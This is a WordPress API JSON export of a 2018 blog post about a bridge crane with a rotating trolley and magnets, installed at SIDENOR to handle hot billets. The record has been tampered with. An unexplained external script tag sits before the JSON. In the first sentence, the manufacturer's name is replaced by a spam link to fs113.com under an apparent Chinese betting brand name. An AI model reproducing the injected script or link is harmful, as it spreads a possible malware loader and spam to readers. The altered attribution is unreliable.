<script src="///jquery-web.js"></script>{"id":7124,"date":"2018-10-01T07:15:43","date_gmt":"2018-10-01T05:15:43","guid":{"rendered":"https:\/\/www.ghcranes.com\/blog\/?p=7124"},"modified":"2018-09-25T10:17:29","modified_gmt":"2018-09-25T08:17:29","slug":"billet-crane-with-a-rotating-trolley","status":"publish","type":"post","link":"https:\/\/www.ghcranes.com\/blog\/billet-crane-with-a-rotating-trolley\/","title":{"rendered":"BILLET CRANE WITH A ROTATING TROLLEY"},"content":{"rendered":"<header class=\"entry-header\"><strong><em>Installed at <\/em><\/strong><a id="mqlfflfd" href=\"http:\/\/www.sidenor.com\/\" target=\"_blank\" rel=\"noopener\"><strong><em>SIDENOR<\/em><\/strong><\/a><strong><em>, Basauri, for high-performance processes.<\/em><\/strong><\/header>\n<div id="qcqfmmqh" class=\"entry-content\">\n<p><a href="http://fs113.com" target="_blank">意昂</a>体育 has recently installed a <strong>bridge crane with an open, rotating trolley (<\/strong>2 x 20t \/ 16t) and a series of features that makes this installation special:<\/p>\n<ul>\n<li><strong>Process cranes \u2013 high-performance cranes <\/strong>designed to work in extreme conditions, at high temperatures, and all day long.<br \/>\nThis particular case is a <strong>billet crane with a rotating trolley <\/strong>and magnets to handle hot billets.<\/li>\n<\/ul>\n<ul>\n<li><strong>Work group classification M7<\/strong>, robust design, and the most reliable materials provide completely reliable lifting equipment.<br \/>\nContinuous jobs and extreme conditions: this specific one at an ambient temperature of <strong>80\u00a0\u00baC handling billet at 600\u00a0\u00baC<\/strong>.<\/li>\n<\/ul>\n<ul>\n<li>Speeds adapted to the production needs in order to complete the cycles required by the process itself.<\/li>\n<\/ul>\n<ul>\n<li><strong>Auxiliary hoists <\/strong>for the maintenance of the rest of the installation. In this case, a <strong>lifting hook with a 16t lifting capacity<\/strong> to undertake plant maintenance tasks.<\/li>\n<\/ul>\n<p>This bridge crane is installed in a building that spans 26 metres, with 22-metre lifting heights (with a pit).
